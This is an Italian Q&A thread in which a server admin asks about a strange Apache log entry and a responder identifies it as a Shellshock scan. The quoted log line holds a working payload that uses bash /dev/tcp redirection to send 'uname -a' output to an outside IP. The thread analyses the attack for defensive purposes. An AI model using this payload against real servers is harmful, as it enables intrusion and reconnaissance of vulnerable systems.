Strana linea di log di apache [duplicato]

3

Ho appena trovato questa voce su uno dei miei server:

213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/ > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash
-c \"echo 109.234.106.8/  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/ > /dev/udp/74.208.79.34/21\""

Quindi, a parte l'iniezione della shell che è stata usata, non ho idea di cosa l'attacker abbia cercato di fare.

Qualche idea?

    
posta johestephan 17.06.2015 - 07:56
fonte

1 risposta

3
  1. Come nella prima riga è visibile, ha provato a utilizzare il Shellshock falla di sicurezza del bash shell.

La sua idea era probabilmente la seguente: lo Shellschock funziona con variabili di ambiente, cioè in alcuni casi la bash eseguiva una variabile d'ambiente come una funzione di shell. E apache mappa i parametri delle richieste http (cookie, stringhe di query, argomenti pubblicati, ecc.) Alle variabili d'ambiente.

Se ci fosse stato uno script cgi sul tuo server scritto in bash e interpretato da una shell bash non fissata, i suoi comandi avrebbero potuto essere eseguiti.

  1. Più tardi ha provato a eseguire diversi comandi di shell. Questi comandi avevano inviato il loro output su protocollo tcp o udp su un server sotto il suo controllo. È perché bash ha un meccanismo di reindirizzamento interno ai flussi di dati tcp e udp, cioè i file che iniziano con / dev / tcp / ip / port sono mappati ai socket di rete. È un meccanismo interno della shell bash.

  2. Probabilmente non era un attacco manuale diretto, ma un tracciamento di robot per i server vulnerabili.

  3. Gli indirizzi IP che ha usato probabilmente non sono i suoi server originali, ma quelli che può già controllare da remoto.

risposta data 17.06.2015 - 08:30
fonte

Leggi altre domande sui tag